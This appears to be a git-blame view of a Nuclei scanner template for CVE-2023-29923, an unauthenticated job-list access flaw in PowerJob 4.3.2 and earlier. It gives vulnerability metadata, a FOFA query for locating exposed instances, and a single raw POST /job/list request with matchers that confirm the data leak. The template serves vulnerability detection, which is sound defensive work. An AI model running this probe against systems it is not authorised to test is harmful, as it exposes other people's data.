2023-05-14 03:14:15 +00:00
|
|
|
id: CVE-2023-29923
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: PowerJob <=4.3.2 - Unauthenticated Access
|
|
|
|
author: For3stCo1d
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or perform malicious actions.
|
2023-09-06 11:43:37 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade PowerJob to a version higher than 4.3.2 or apply the necessary patches to fix the authentication bypass issue.
|
2023-05-14 03:14:15 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/PowerJob/PowerJob/issues/587
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-29923
|
2023-07-11 19:49:27 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
cvss-score: 5.3
|
|
|
|
cve-id: CVE-2023-29923
|
|
|
|
cwe-id: CWE-276
|
2023-10-25 17:36:19 +00:00
|
|
|
epss-score: 0.00336
|
2024-01-14 13:49:27 +00:00
|
|
|
epss-percentile: 0.68252
|
2023-09-06 11:43:37 +00:00
|
|
|
cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:*
|
2023-05-14 03:14:15 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:43:37 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: powerjob
|
|
|
|
product: powerjob
|
2023-09-06 11:43:37 +00:00
|
|
|
fofa-query: app="PowerJob"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve2023,cve,powerjob,unauth
|
2023-05-14 03:14:15 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /job/list HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json;charset=UTF-8
|
|
|
|
|
|
|
|
{"appId":1,"index":0,"pageSize":10}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '{"success":true,"data":{"index":0,"pageSize":10,'
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
2023-05-16 20:29:24 +00:00
|
|
|
- "application/json"
|
2023-05-14 03:14:15 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-01-14 14:05:19 +00:00
|
|
|
# digest: 4a0a00473045022100d28fd8874ef4c29594c38b351266fc4b24f626bbfa44b8c43e32d35239d67937022066eb0211e263cff7a8f8d07e9c5ec93500b73a73724ee2b0e834597e394c0ab9:922c64590222798bb761d5b6d8e72950
|